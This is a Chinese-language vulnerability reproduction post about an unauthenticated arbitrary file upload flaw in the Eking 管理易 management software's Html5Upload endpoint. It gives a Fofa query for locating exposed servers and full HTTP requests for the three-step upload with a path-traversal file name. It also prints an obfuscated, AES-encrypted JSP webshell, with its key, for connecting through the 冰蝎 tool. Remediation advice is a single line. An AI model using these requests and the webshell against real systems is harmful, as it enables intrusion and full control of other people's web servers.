0x01 产品描述:
Eking管理易是一款专为广告制品制作企业量身定制的管理软件产品,旨在帮助企业实现规范化、科学化管理,提升运营效率和降低运营成本。 该软件由广州易凯软件技术有限公司开发,基于JAVA企业版技术研发,采用B/S架构,支持Internet应用,能够适应广告装饰、有机工艺、展览展示、有机丝印、喷绘写真等广告标识制作企业的需求
0x02 漏洞描述:
EKing-管理易/Html5Upload 接口处存在前台任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器
0x03 搜索语句:
Fofa:app="EKing-管理易"
0x04 漏洞复现:
该漏洞需要通过/Html5Upload 接口分三步进行操作,通过Html5Upload 接口依次进行文件名创建,数据上传,文件保存。
文件名创建:
POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
comm_type=INIT&sign_id=shell1&vp_type=default&file_name=../../test1.jsp&file_size=2048
数据上传:
注意这里sign_id需要跟随文件创建的sign_id 否则数据上传地址不是同一个
POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
Connection: close
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="comm_type"
DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="sign_id"
shell1
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data_inde"
0
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data"; filename="chunk1"
Content-Type: application/octet-stream
<% out.println("test");%>
------WebKitFormBoundaryj7OlOPiiukkdktZR--
保存文件:
同样需注意这里的sign_id
POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
comm_type=END&sign_id=shell1&file_name=../../test1.jsp
访问保存文件名地址:
webshell构建
POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
Connection: close
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="comm_type"
DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="sign_id"
shell1
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data_inde"
0
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data"; filename="chunk1"
Content-Type: application/octet-stream
<%! public byte[] Af5Wb(String Strings,String k) throws Exception { javax.crypto.Cipher BBswL9 = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");BBswL9.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));byte[] bytes;try{int[] aa = new int[]{122, 113, 102, 113, 62, 101, 100, 121, 124, 62, 82, 113, 99, 117, 38, 36};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr); Object decoder = clazz.getMethod("getDecoder").invoke(null);bytes = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, Strings);}catch (Throwable e){int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr);bytes = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), Strings);}byte[] result = (byte[]) BBswL9.getClass()./*Zw8Cf543c0*/getDeclaredMethod/*Zw8Cf543c0*/("doFinal", new Class[]{byte[].class}).invoke(BBswL9,new Object[]{bytes});return result;} %><% try { String KF5n3T9 = "dfff0a7fa1a55c8c"; session.putValue("u", KF5n3T9); byte[] Iu73Wlq = Af5Wb (request.getReader().readLine(),KF5n3T9); java./*Zw8Cf543c0*/lang./*Zw8Cf543c0*/reflect.Method Af5Wb = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Zw8Cf543c0*/("defineClass",byte[].class,int/**/.class,int/**/.class); Af5Wb.setAccessible(true); Class i = (Class)Af5Wb.invoke(Thread.currentThread()./*Zw8Cf543c0*/getContextClassLoader(), Iu73Wlq , 0, Iu73Wlq.length); Object QsG8 = i./*Zw8Cf543c0*/newInstance(); QsG8.equals(pageContext); } catch (Exception e) {} %>
------WebKitFormBoundaryj7OlOPiiukkdktZR--
数据上传后进行文件保存并通过冰蝎4.1进行连接
0x05 修复建议:
官方已发布补丁 请即时修复。
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » Eking管理易 Html5Upload 前台任意文件上传漏洞复现
发表评论 取消回复